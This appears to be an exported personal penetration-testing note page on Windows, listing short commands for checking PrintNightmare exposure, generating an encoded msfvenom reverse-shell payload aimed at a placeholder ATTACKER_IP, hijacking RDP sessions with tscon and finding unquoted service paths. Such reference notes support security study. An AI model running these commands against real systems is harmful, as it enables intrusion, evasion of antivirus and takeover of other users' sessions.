<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../style.css">
    <base target="_parent">
    <title data-trilium-title>Windows</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Windows</h1>

      <div class="ck-content">
        <p>To check if remote machine is vulnerable to print-nightmare</p><pre><code class="language-text-plain">rpcdump.py @10.10.10.10 | egrep 'MS-RPRN|MS-PAR'</code></pre>

        <p><code>C:\$Recycle.bin\&lt;SID&gt;</code>, where SID is for individual
          users.</p>
        <p>powershell wrapped windows exploitation binaries resource: <a href="https://github.com/S3cur3Th1sSh1t/PowerSharpPack">https://github.com/S3cur3Th1sSh1t/PowerSharpPack</a> </p>
        <p>To use encoders with metasploit, use:</p><pre><code class="language-text-plain">msfvenom -a x86 --platform Windows LHOST=ATTACKER_IP LPORT=443 -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f csharp</code></pre>

        <p>To get details about a running service:</p><pre><code class="language-text-plain">Get-WMIObject -Class Win32_Service -Filter "Name='ivpn client'" |
select-object *</code></pre>

        <p>to switch an rdp session when you have administrator privileges, use:</p><pre><code class="language-text-plain">tscon 3 /dest:rdp-tcp#6 </code></pre>

        <p>where 3 is the id of the target session and 6 is your current session
          id.</p>
        <p>To find unquoted service path vulns, use:</p><pre><code class="language-text-plain">wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v
"c:\windows\\" |findstr /i /v """</code></pre>
      </div>
    </div>
  </body>

</html>